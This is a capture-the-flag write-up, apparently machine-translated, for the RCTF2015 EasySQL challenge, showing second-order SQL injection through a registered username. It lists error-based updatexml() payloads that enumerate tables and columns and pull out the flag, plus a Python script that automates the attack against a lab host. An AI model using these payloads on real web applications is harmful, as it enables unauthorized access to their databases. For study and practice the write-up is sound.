[RCTF2015]EasySQL
Open the drone, the interface is as follows
To the registration page, I tried it,
username
andemail
place a filter directly fuzz about which characters are bannedAfter successful registration, there is a function to change the password, the test center here should be the secondary injection
It has been handling special characters when stored in the database, but when you modify the code here, read out from the database, no data processing
Registered user name
'sss"\
in the Change Password error there at the EchoCan guess sql statement should be similar like this
select * from user where username="'sss"\" and password='d41d8cd98f00b204e9800998ecf8427e'
username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#
After testing, flag not in the flag table
username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users'))),1))#
It found that output have length restrictions
username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')&&(column_name)regexp('^r'))),1))#
username=peri0d"||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1))#
Here it is embarrassing, it is better to
reverse
reverse outputusername=peri0d"||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('f'))),1))#
Put a script, on behalf of the entire process of this title, but also recorded my silly
import requests url_reg = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/register.php' url_log = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/login.php' url_change = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/changepwd.php' pre = 'peri0d"' suf = "'))),1))#" s = 'abcdefghijklmnopqrstuvwxyz1234567890' s = list(s) r = requests.session() def register(name): data = { 'username' : name, 'password' : '123', 'email' : '123', } r.post(url=url_reg, data=data) def login(name): data = { 'username' : name, 'password' : '123', } r.post(url=url_log, data=data) def changepwd(): data = { 'oldpass' : '', 'newpass' : '', } kk = r.post(url=url_change, data=data) if 'target' not in kk.text: print(kk.text) for i in s: paylaod = pre + "||(updatexml(1,concat((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + suf register(paylaod) login(paylaod) changepwd()